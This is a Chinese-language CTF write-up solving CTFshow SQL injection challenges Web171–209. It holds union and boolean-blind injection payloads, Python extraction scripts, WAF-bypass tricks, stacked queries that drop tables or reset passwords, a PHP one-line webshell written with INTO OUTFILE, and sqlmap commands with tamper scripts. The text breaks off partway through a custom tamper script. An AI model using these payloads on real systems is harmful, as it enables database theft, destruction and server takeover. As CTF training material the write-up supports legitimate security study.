【全·SQL注入】CTFshow SQL注入 WriteUp

本文最后更新于:2022年2月1日晚上9点16分

前置知识:

爆数据库:

1
select 1,(select group_concat(schema_name) from information_schema.schemata),3

爆数据表:

1
select 1,(select group_concat(table_name) from information_schema.tables where table_schema="数据库名") ,3

爆字段:

1
select 1,(select group_concat(column_name) from information_schema.columns where table_name="表名"),3

爆数据:

1
2
select 1,(select group_concat(字段名) from 数据库名.表名),3
# select 1,(select group_concat(password) from security.users),3

Web171——联合注入

打开题目:

image-20211003165210680

其中SQL语句如下:

1
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

这里使用的是单引号包裹id,因此先使用联合注入:

爆数据库:

1
1' union select 1,2,database();--+

image-20211003165623670

数据库名为: ctfshow_web

爆数据表:

1
1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow_web");--+

image-20211003170110442

数据表为:ctfshow_user

爆字段:

1
1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name="ctfshow_user");--+

image-20211003170224389

字段为:id,username,password

爆值:

1
1' union select 1,2,(select group_concat(password) from ctfshow_web.ctfshow_user);--+

image-20211003170409114

得到flag

Web172——联合注入过滤flag

打开题目:

image-20211003172357023

1
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
1
2
3
4
//检查结果是否有flag
if($row->username!=='flag'){
$ret['msg']='查询成功';
}

这题因为flag形式为ctfshow,所以不会被过滤

payload如下:

1
1' union select 1,(select group_concat(password) from ctfshow_web.ctfshow_user2 where username = "flag"); --+

image-20211003172512222

Web173——利用hex绕过

打开题目:

image-20211003173734269

1
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
1
2
3
4
//检查结果是否有flag
if(!preg_match('/flag/i', json_encode($ret))){
$ret['msg']='查询成功';
}

和上一题一样,虽然过滤了flag,但是过滤了个寂寞

payload如下:

1
1' union select 1,2,(select group_concat(password) from ctfshow_web.ctfshow_user3 where username = "flag");--+

image-20211003173926910

当然也可以用hex函数,转为十六进制

Web174——利用replace绕过数字

打开题目:

image-20211003175922000

1
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
1
2
3
4
//检查结果是否有flag
if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
$ret['msg']='查询成功';
}

这题过滤了返回值的数字,那么我们可以使用replace进行替换,然后再复原即可。

payload如下:

1
-1' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(hex(username),'1','numa'),'2','numb'),'3','numc'),'4','numd'),'5','nume'),'6','numf'),'7','numg'),'8','numh'),'9','numi'),'0','numj'),replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(hex(password),'1','numa'),'2','numb'),'3','numc'),'4','numd'),'5','nume'),'6','numf'),'7','numg'),'8','numh'),'9','numi'),'0','numj') from ctfshow_user4 where username='flag'--+

得到:

1
numfnumcnumgnumdnumfnumfnumgnumcnumfnumhnumfFnumgnumgnumgBnumcnumhnumcnumcnumcnumfnumfnumbnumcnumdnumcnuminumfnumenumcnumdnumbDnumfnumbnumcnumenumcnuminumcnumhnumbDnumcnumdnumcnumjnumcnumcnumfnumbnumbDnumfnumanumcnumcnumcnumgnumfnumfnumbDnumcnumanumcnumbnumfnumanumcnumanumfnumdnumcnumjnumcnumbnumcnumdnumfnumfnumcnumanumcnuminumcnumjnumgD

将其进行还原:

1
63746673686F777B38333662343965342D623539382D343033622D613337662D3132613164303234663139307D

然后十六进制解码:

1
ctfshow{836b49e4-b598-403b-a37f-12a1d024f190}

Web175——利用outfile写文件

打开题目:

image-20211005131730849

1
$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";
1
2
3
4
//检查结果是否有flag
if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
$ret['msg']='查询成功';
}

这一题把输出中所有ascii码字符都禁用了,尝试利用outfile写文件

1
1' union select 1,password from ctfshow_user5 where username = 'flag' into outfile '/var/www/html/1.txt' --+

访问1.txt即可得到flag:

image-20211005132045696

当然,也可以直接写一句话木马:

1
1' union select 1,"<?php eval($_POST[1])?>" into outfile '/var/www/html/1.php' --+

但是一句话木马不能直接拿flag

Web176——大小写绕过

打开题目:

image-20211005133100579

1
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";

这一题经过测试之后,过滤了小写的关键字,因此可以直接用大写绕过:

1
1' OR 1=1 --+

image-20211005133331245

即可直接拿flag

Web177——空格绕过

这一题是空格绕过,用--+注释会返回空数据,因此用#注释,不过需要进行URL编码

直接给出payload:

1
1'/**/or/**/1=1/**/;%23
1
1'%09or%091=1%09;%23
1
1'%0bor%0b1=1%0b;%23
1
1'%0cor%0c1=1%0c;%23
1
1'%0aor%0a1=1%0a;%23
1
1'%0dor%0d1=1%0d;%23

因此空格绕过有以下几种:

1
%0a %0b %0c %0d %09 /**/

Web178——减号绕过

这一题用上一题payload可以直接打,因为过滤了-,相当于过滤了其中--+的注释方法,不过可以用%23代替:

1
1'/**/or/**/1=1/**/;%23

Web179——空格绕过

这一题过滤了空格,%0a %0b %0d %09 /**/,不过还有个%0c没过滤

1
1'%0cor%0c1=1;%23

Web180——and优先级高于or

1
1111'or(id=26)and'a'='a

Web181——and优先级高于or

1
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";

这一题给出了waf的源码:

1
2
3
function waf($str){
return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);
}

用上一题的payload也可以打通:

1
1111'or(id=26)and'a'='a

Web182——and优先级高于or

同样也给出了waf,如下:

1
2
3
4
//对传入的参数进行了过滤
function waf($str){
return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);
}

用上一题的payload可以打通:

1
1111'or(id=26)and'a'='a

Web183——布尔盲注(过滤等号)

打开题目:

image-20211005152235853

1
$sql = "select count(pass) from ".$_POST['tableName'].";";
1
2
3
function waf($str){
return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into/i', $str);
}

这一题是布尔盲注,过滤了等号,用like或者regexp代替,根据返回的记录总数进行盲注

脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests

url = "http://39805c2e-d5bd-457f-b6cd-5d9ccffb79b7.challenge.ctf.show:8080/select-waf.php"
flagstr = "{qwertyuiopasdfghjklzxcvbnm0123456789-_}"
payload = '(ctfshow_user)where(substr(`pass`,{},1)like("{}"))'
flag = ""

for i in range(50):
for j in flagstr:
data = {
"tableName":payload.format(str(i) , j)
}
res = requests.post(url , data = data)
if "$user_count = 1;" in res.text:
flag += j
print(flag)

Web184——join布尔盲注,group聚合函数

打开题目:

image-20211005162948207

1
2
//拼接sql语句查找指定ID用户
$sql = "select count(*) from ".$_POST['tableName'].";";

waf如下

1
2
3
4
5
//对传入的参数进行了过滤
function waf($str){
return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
}

这一题过滤了where,因此用join结合on进行操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests

url = "http://797ffe1a-8995-48be-b2f2-cc57aebb5ded.challenge.ctf.show:8080/select-waf.php"
flagstr = "{qwertyuiopasdfghjklzxcvbnm0123456789-_}"
payload = 'ctfshow_user as a right join ctfshow_user as b on substr(b.pass,{},1)regexp(char({}))'
flag = ""

for i in range(60):
for j in range(127):
data = {
"tableName":payload.format(str(i) , str(j))
}
res = requests.post(url , data = data)
if "$user_count = 43;" in res.text:
flag += chr(j)
print(flag)

得到结果如下:

image-20211005162652499

将结果稍加处理:

1
12ACac12DTdt12FMfmIiHNhnWw{Ee614.5.0.Dd.4-..8.9.1.7-..4.1.4.Aa-..Aa.9.4.2-..Bb.Dd.Cc.0.7.Ff.Bb.Ff.Dd.5.3.3.}
1
ctfshow{e61450d4-8917-414a-a942-bdc07fbfd533}

除此之外,也可以使用十六进制结合聚合函数:

payload:tableName=ctfshow_user group by pass having pass like 0x63746673686f777b25

脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#   tableName=ctfshow_user group by pass having pass like 0x63746673686f777b25
# tableName=ctfshow_user group by pass having pass like ctfshow{%
import requests

url = "http://797ffe1a-8995-48be-b2f2-cc57aebb5ded.challenge.ctf.show:8080/select-waf.php"
flagstr = "{qwertyuiopasdfghjklzxcvbnm0123456789-_}"
payload = 'ctfshow_user group by pass having pass like 0x{}25'
flag = "63746673686f777b"

def str_16(str):
str = hex(ord(str))
str = str.replace("0x","")
return str

for i in range(65):
for j in flagstr:
data = {
"tableName":payload.format(flag + str_16(j))
}
res = requests.post(url , data = data)
if "$user_count = 1;" in res.text:
flag += str_16(j)
print(flag)
break

得到:

1
63746673686f777b65363134353064342d383931372d343134612d613934322d6264633037666266643533335f

转十进制之后,稍作修改即可得到flag

Web185——构造数字

这一题利用数据库的特性,true=1true+true=2

脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import time
import requests

url = "http://0b37eed9-a549-4aff-9764-f27a1301576f.challenge.ctf.show:8080/select-waf.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{"
flag = ""
payload = "ctfshow_user as a right join ctfshow_user as b on substr(b.pass,{},{})regexp(char({}))"

def num(n):
res = "true"
if n == 1:
return res
else:
for i in range(n - 1):
res += "+true"
return res

for i in range(50):
for j in flagstr:
data = {
"tableName":payload.format(num(i),num(1),num(ord(j)))
}
try:
res = requests.post(url , data=data)
if "$user_count = 43;" in res.text:
flag += j
print(flag)
except:
continue
else:
continue

Web186——构造数字

这题和Web185一样

直接给出脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import time
import requests

url = "http://8194f31b-36e2-43b4-8361-d7d884bb7e20.challenge.ctf.show/select-waf.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{"
flag = ""
payload = "ctfshow_user as a right join ctfshow_user as b on substr(b.pass,{},{})regexp(char({}))"

def num(n):
res = "true"
if n == 1:
return res
else:
for i in range(n - 1):
res += "+true"
return res

for i in range(50):
for j in flagstr:
data = {
"tableName":payload.format(num(i),num(1),num(ord(j)))
}
try:
res = requests.post(url , data=data)
if "$user_count = 43;" in res.text:
flag += j
print(flag)
except:
continue
else:
continue

Web187——md5(password,true)绕过

1
md5("ffifdyop",true) = 'or'6]!r,b
1
2
3
4
5
6
select count(*) from ctfshow_user where username = '$username' and password=''or'6]!r,b'
也就是:
select count(*) from ctfshow_user where username = '$username' and password= ''or '6]!r,b'
也就是:
select count(*) from ctfshow_user where FALSE or TRUE
or的存在配合后面的TRUE就绕过了

这题传用户名为admin,密码为ffifdyop即可绕过

Web188——MySQL弱类型比较

1
2
//拼接sql语句查找指定ID用户
$sql = "select pass from ctfshow_user where username = {$username}";
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
//用户名检测
if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){
$ret['msg']='用户名非法';
die(json_encode($ret));
}

//密码检测
if(!is_numeric($password)){
$ret['msg']='密码只能为数字';
die(json_encode($ret));
}

//密码判断
if($row['pass']==intval($password)){
$ret['msg']='登陆成功';
array_push($ret['data'], array('flag'=>$flag));
}

这一题在intval地方有一个弱比较,因此大胆假设$password为字符,那么在password地方传入0即可

1
username=0&password=0

Web189——load_file结合正则进行盲注

flag在api/index.php文件中

1
2
//拼接sql语句查找指定ID用户
$sql = "select pass from ctfshow_user where username = {$username}";
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
//用户名检测
if(preg_match('/select|and| |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\x26|\x7c|or|into|from|where|join|sleep|benchmark/i', $username)){
$ret['msg']='用户名非法';
die(json_encode($ret));
}

//密码检测
if(!is_numeric($password)){
$ret['msg']='密码只能为数字';
die(json_encode($ret));
}

//密码判断
if($row['pass']==$password){
$ret['msg']='登陆成功';
}

这一题利用密码错误和用户名不存在的返回信息不同进行盲注

题目提示flag在api/index.php里,因此利用load_file加载文件,结合正则匹配进行盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests

url = "http://ab1cc1c0-7f6a-401a-8007-9952e223e649.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{"
flag = "ctfshow"
payload = "if(load_file('/var/www/html/api/index.php')regexp('{}'),0,1)"

for i in range(60):
for j in flagstr:
data = {
"username":payload.format(flag+j),
"password":"0"
}
res = requests.post(url , data=data)
if r'\u5bc6\u7801\u9519\u8bef' in res.text:
flag += j
print(flag)

Web190——利用页面回显进行布尔盲注

1
2
3
4
5
6
7
8
9
//密码检测 
if(!is_numeric($password)){
$ret['msg']='密码只能为数字';
die(json_encode($ret));
}
//密码判断
if($row['pass']==$password){
$ret['msg']='登陆成功'; }
//TODO:感觉少了个啥,奇怪

爆库名字:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests

url = "http://f9b7c179-d752-45e2-957c-d46bd9111fe3.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flag = ""
payload = r"' or if(ascii(substr(database(),{},1))={},0,1)#"

for i in range(40):
for j in flagstr:
data = {
"username":payload.format(str(i),str(ord(j))),
"password":"0"
}
res = requests.post(url , data = data)
if r"\u5bc6\u7801\u9519\u8bef" not in res.text:
flag += j
print(flag)

得到库名:ctfshow_web

爆数据表名字:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests

url = "http://f9b7c179-d752-45e2-957c-d46bd9111fe3.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flag = ""
payload = r"' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={},0,1)#"

for i in range(40):
for j in flagstr:
data = {
"username":payload.format(str(i),str(ord(j))),
"password":"0"
}
res = requests.post(url , data = data)
if r"\u5bc6\u7801\u9519\u8bef" not in res.text:
flag += j
print(flag)

得到数据表名:ctfshow_fl0g,ctfshow_user

爆字段名:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests

url = "http://f9b7c179-d752-45e2-957c-d46bd9111fe3.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flag = ""
payload = r"' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x63746673686f775f666c3067),{},1))={},0,1)#"

for i in range(40):
for j in flagstr:
data = {
"username":payload.format(str(i),str(ord(j))),
"password":"0"
}
res = requests.post(url , data = data)
if r"\u5bc6\u7801\u9519\u8bef" not in res.text:
flag += j
print(flag)

得到字段名:id,f1ag

爆值:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests

url = "http://f9b7c179-d752-45e2-957c-d46bd9111fe3.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flag = ""
payload = r"' or if(ascii(substr((select group_concat(f1ag) from ctfshow_web.ctfshow_fl0g),{},1))={},0,1)#"

for i in range(40):
for j in flagstr:
data = {
"username":payload.format(str(i),str(ord(j))),
"password":"0"
}
res = requests.post(url , data = data)
if r"\u5bc6\u7801\u9519\u8bef" not in res.text:
flag += j
print(flag)

Web191——布尔盲注(ord代替ASCII)

1
2
3
4
5
//TODO:感觉少了个啥,奇怪 
if(preg_match('/file|into|ascii/i', $username)){
$ret['msg']='用户名非法';
die(json_encode($ret));
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import time

import requests

url = "http://c745ae90-d549-44aa-b498-6350c7787061.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flag = ""
payload = r"' or if(ord(substr((select group_concat(f1ag) from ctfshow_web.ctfshow_fl0g),{},1))={},0,1)#"

for i in range(60):
for j in flagstr:
data = {
"username":payload.format(str(i),str(ord(j))),
"password":"0"
}
res = requests.post(url , data = data)
if r"\u5bc6\u7801\u9519\u8bef" not in res.text:
flag += j
print(flag)
time.sleep(0.3)

Web192——布尔盲注(regexp代替ord、ascii)

1
2
3
4
5
//TODO:感觉少了个啥,奇怪 
if(preg_match('/file|into|ascii|ord|hex/i', $username)){
$ret['msg']='用户名非法';
die(json_encode($ret));
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import time

import requests

url = "http://ddd59f53-f877-40a4-97e1-ef74b962b7db.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flag = ""
payload = r"' or if(substr((select group_concat(f1ag) from ctfshow_fl0g), {},1)regexp('{}'),1,0) ='1"

for i in range(60):
for j in flagstr:
data = {
"username":payload.format(str(i),str(j)),
"password":"0"
}
res = requests.post(url , data = data)
if r"\u5bc6\u7801\u9519\u8bef" in res.text:
flag += j
print(flag)
time.sleep(0.3)

Web193——布尔盲注(left代替substr)

1
2
3
4
5
//TODO:感觉少了个啥,奇怪 
if(preg_match('/file|into|ascii|ord|hex|substr/i', $username)){
$ret['msg']='用户名非法';
die(json_encode($ret));
}

left用法:

1
2
left("abc",2)
返回从左边第一个开始两个字符"ab"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
mysql> select left("abc",1);
+---------------+
| left("abc",1) |
+---------------+
| a |
+---------------+
1 row in set (0.00 sec)

mysql> select left("abc",2);
+---------------+
| left("abc",2) |
+---------------+
| ab |
+---------------+
1 row in set (0.00 sec)

mysql> select left("abc",3);
+---------------+
| left("abc",3) |
+---------------+
| abc |
+---------------+
1 row in set (0.00 sec)

image-20220121205054381

这题换了数据表:ctfshow_flxg

有点小坑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import time

import requests

url = "http://328932d3-030e-460a-923e-6003243856d4.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flag = ""
payload = r"' or if(left((select group_concat(f1ag) from ctfshow_flxg), {})regexp('{}'),1,0) ='1"

for i in range(60):
for j in flagstr:
tj = flag+j
data = {
"username":payload.format(str(i),tj),
"password":"0"
}
res = requests.post(url , data = data)
if r"\u5bc6\u7801\u9519\u8bef" in res.text:
flag += j
print(flag)
time.sleep(0.3)

Web194——布尔盲注(locate代替substr、left)

1
2
3
4
5
//TODO:感觉少了个啥,奇怪 
if(preg_match('/file|into|ascii|ord|hex|substr|char|left|right|substring/i',
$username)){ $ret['msg']='用户名非法';
die(json_encode($ret));
}

locate用法:

1
2
locate("ab","abxx")
返回第一个参数在第二个参数中出现的位置,从1开始计数

image-20220121205513860

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
mysql> select locate("ab","abxx");
+---------------------+
| locate("ab","abxx") |
+---------------------+
| 1 |
+---------------------+
1 row in set (0.00 sec)

mysql> select locate("bx","abxx");
+---------------------+
| locate("bx","abxx") |
+---------------------+
| 2 |
+---------------------+
1 row in set (0.00 sec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import time

import requests

url = "http://bd4fa184-8dec-427e-943d-762e0ed0deb9.challenge.ctf.show/api/index.php"
flagstr_full = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flagstr = "1234567890{-}abcdef"
flag = "ctfshow"
payload = r"' or if(locate('{}',(select group_concat(f1ag) from ctfshow_flxg)),1,0) ='1"

for i in range(60):
for j in flagstr:
tj = flag+j
data = {
"username":payload.format(tj),
"password":"0"
}
res = requests.post(url , data = data)
if r"\u5bc6\u7801\u9519\u8bef" in res.text:
flag += j
print(flag)
time.sleep(0.3)

Web195——堆叠注入(修改密码&弱类型)

UPDATE用法

1
UPDATE 表名称 SET 列名称 = 新值 WHERE 列名称 = 某值

使用update修改密码

1
0;update`ctfshow_user`set`pass`=1

然后登录

用户名为0,密码为1

image-20220121213503860

Web196——堆叠注入(PHP弱类型&修改密码)

1
1;select(0);

用户名1;select(0);

密码0

image-20220121214050053

Web197——堆叠注入(删表后新建表)

先删表,再新建表

1
0;drop table ctfshow_user;create table ctfshow_user(`username` varchar(100),`pass` varchar(100));insert ctfshow_user(`username`,`pass`) value(1,2)

执行完成后,用用户名1,密码2登录

image-20220121215105935

Web198——堆叠注入(字段互换)

思路就是将idpass两列交换,然后爆破id即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests
url = 'http://6f1f5536-6bd1-47ee-9192-804119a45a98.challenge.ctf.show/api/'
payload = '0;alter table ctfshow_user change `pass` `tmp` varchar(255);alter table ctfshow_user change `id` `pass` varchar(255);alter table ctfshow_user change `tmp` `id` varchar(255);'
for i in range(100):
if i == 0:
data_1 = {
'username':payload,
'password':i
}
r_1=requests.post(url=url,data=data_1).text
data_2 = {
'username':'0x61646d696e',
'password':i
}
r_2=requests.post(url=url,data=data_2).text
if "ctfshow" in r_2:
print(r_2)

Web199——堆叠注入(利用表名)

1
2
1;show tables
ctfshow_user

image-20220122001616346

Web200——堆叠注入(利用表名)

同上

1
2
1;show tables
ctfshow_user

image-20220122002310730

Web201——sqlmap(设置referer和user-agent)

1
python3 sqlmap.py -u "http://3c4da269-373b-4e38-938e-14962076aa95.challenge.ctf.show/api/index.php?id=" --user-agent="sqlmap" --referer="ctf.show" --dump --batch

Web202——sqlmap(设置–data为post执行)

1
python3 sqlmap.py -u "http://484dce36-9d60-49ef-bae8-2c045e431c10.challenge.ctf.show/api/index.php" --data="id=1" --user-agent="sqlmap" --referer="ctf.show" --dump --batch

Web203——sqlmap(设置PUT请求)

注意,使用PUT请求需要将Content-Type修改为text/plain,因为PUT请求默认为表单形式

1
python3 sqlmap.py -u "http://856e18c1-7fd9-4d88-a6a0-c56917ed00d2.challenge.ctf.show/api/index.php" --method="PUT" --headers="Content-Type: text/plain" --data="id=1" --refer="ctf.show" --dump --batch

Web204——sqlmap(设置cookie)

1
python3 sqlmap.py -u http://8cf6081a-568f-46b5-9a9e-e4c2beef9972.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --cookie="ctfshow=84ff260d364f38603acc15780013e5db;PHPSESSID=6jjk7bnrd818k953hkr0ruih6g" --referer="http://8cf6081a-568f-46b5-9a9e-e4c2beef9972.challenge.ctf.show/sqlmap.php" --headers="Content-Type:text/plain" --dump --batch

Web205——sqlmap(–safe-url,–safe-freq鉴权)

1
python3 sqlmap.py -u "http://6a5af834-b7e2-419d-9d1c-dc98d487298d.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://6a5af834-b7e2-419d-9d1c-dc98d487298d.challenge.ctf.show/api/getToken.php" --safe-freq=1 --data="id=1" -D ctfshow_web -T ctfshow_flax --dump

Web206——sqlmap(sql自动会判断闭合)

1
python3 sqlmap.py -u "http://02c21f8f-68a2-4ee9-80fc-3eaeee5f4185.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://02c21f8f-68a2-4ee9-80fc-3eaeee5f4185.challenge.ctf.show/api/getToken.php" --safe-freq=1 --data="id=1" --dump --batch

Web207——sqlmap(tamper脚本将空格转注释)

这里使用sqlmap自带的tamper脚本space2comment.py,绕过空格

1
python3 sqlmap.py -u "http://874902ce-e21a-4ec1-923d-c9c5ec0be297.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://874902ce-e21a-4ec1-923d-c9c5ec0be297.challenge.ctf.show/api/getToken.php" --tamper=space2comment.py --safe-freq=1 --data="id=1" -T ctfshow_flaxca --dump --batch

space2comment.py内容如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
pass

def tamper(payload, **kwargs):
"""
Replaces space character (' ') with comments '/**/'

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0

Notes:
* Useful to bypass weak and bespoke web application firewalls

>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
"""

retVal = payload

if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False

for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += "/**/"
continue

elif payload[i] == '\'':
quote = not quote

elif payload[i] == '"':
doublequote = not doublequote

elif payload[i] == " " and not doublequote and not quote:
retVal += "/**/"
continue

retVal += payload[i]

return retVal

对于常见的tamper脚本,其各个脚本作用如下:

序号 脚本名称 注释
1 0x2char 将每个编码后的字符转换为等价表达
2 apostrophemask 单引号替换为Utf8字符
3 apostrophenullencode 替换双引号为%00%27
4 appendnullbyte 有效代码后添加%00
5 base64encode 使用base64编码
6 between 比较符替换为between
7 bluecoat 空格替换为随机空白字符,等号替换为like
8 chardoubleencode 双url编码
9 charencode 将url编码
10 charunicodeencode 使用unicode编码
11 charunicodeescape 以指定的payload反向编码未编码的字符
12 commalesslimit 改变limit语句的写法
13 commalessmid 改变mid语句的写法
14 commentbeforeparentheses 在括号前加内联注释
15 concat2concatws 替换CONCAT为CONCAT_WS
16 equaltolike 等号替换为like
17 escapequotes 双引号替换为\\
18 greatest 大于号替换为greatest
19 halfversionedmorekeywords 在每个关键字前加注释
20 htmlencode html编码所有非字母和数字的字符
21 ifnull2casewhenisnull 改变ifnull语句的写法
22 ifnull2ifisnull 替换ifnull为if(isnull(A))
23 informationschemacomment 标示符后添加注释
24 least 替换大于号为least
25 lowercase 全部替换为小写值
26 modsecurityversioned 空格替换为查询版本的注释
27 modsecurityzeroversioned 添加完整的查询版本的注释
28 multiplespaces 添加多个空格
29 nonrecursivereplacement 替换预定义的关键字
30 overlongutf8 将所有字符转义为utf8
31 overlongutf8more 以指定的payload转换所有字符
32 percentage 每个字符前添加%
33 plus2concat 将加号替换为concat函数
34 plus2fnconcat 将加号替换为ODBC函数{fn CONCAT()}
35 randomcase 字符大小写随机替换
36 randomcomments /**/分割关键字
37 securesphere 添加某字符串
38 sp_password 追加sp_password字符串
39 space2comment 空格替换为/**/
40 space2dash 空格替换为–加随机字符
41 space2hash 空格替换为#加随机字符
42 space2morecomment 空格替换为/**_**/
43 space2morehash 空格替换为#加随机字符及换行符
44 space2mssqlblank 空格替换为其他空符号
45 space2mssqlhash 空格替换为%23%0A
46 space2mysqlblank 空格替换为其他空白符号
47 space2mysqldash 空格替换为–%0A
48 space2plus 空格替换为加号
49 space2randomblank 空格替换为备选字符集中的随机字符
50 symboliclogical AND和OR替换为&&和||
51 unionalltounion union all select替换为union select
52 unmagicquotes 宽字符绕过GPC
53 uppercase 全部替换为大写值
54 varnish 添加HTTP头
55 versionedkeywords 用注释封装每个非函数的关键字
56 versionedmorekeywords 使用注释绕过
57 xforwardedfor 添加伪造的HTTP头

Web208——sqlmap(多tamper使用)

其实这题和上题一样,虽然多过滤了一个select,但是sqlmap使用的都是大写的SELECT,因此用上一题的脚本也是能跑的

当然也可以自己写一个tamper,将SELECT转换为seselectlect,虽然比较繁琐,但是比较符合题意。

多tamper使用方法:

1
--tamper="tamper/1.py,tamper/2.py"
1
python3 sqlmap.py -u "http://53df31eb-ad30-47ee-8baf-3226ce9d3373.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://53df31eb-ad30-47ee-8baf-3226ce9d3373.challenge.ctf.show/api/getToken.php" --tamper="tamper/space2comment.py,tamper/randomcase.py" --safe-freq=1 --data="id=1" -T ctfshow_flaxcac --dump --batch

Web209——sqlmap(自定义tamper)

这题过滤如下

1
2
3
4
5
//对传入的参数进行了过滤
function waf($str){
//TODO 未完工
return preg_match('/ |\*|\=/', $str);
}

这题需要将空格和*=替换,自己写一个tamper

1
python3 sqlmap.py -u "http://1c06de92-b8e4-4c14-82fb-16547c048e70.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://1c06de92-b8e4-4c14-82fb-16547c048e70.challenge.ctf.show/api/getToken.php" --tamper="doubleSelect1" --safe-freq=1 --data="id=1" --dump --batch

doubleSelect1.py内容如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/usr/bin/env python

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import string
import base64

__priority__ = PRIORITY.LOW

def dependencies():
pass

def tamper(payload, **kwargs):
"""
Replaces space character ('select') with comments 'seselectlect'

Tested against:
* MySQL 5.5

Notes:
* Useful to bypass weak and bespoke web application firewalls

>>> tamper('SELECT id FROM users')
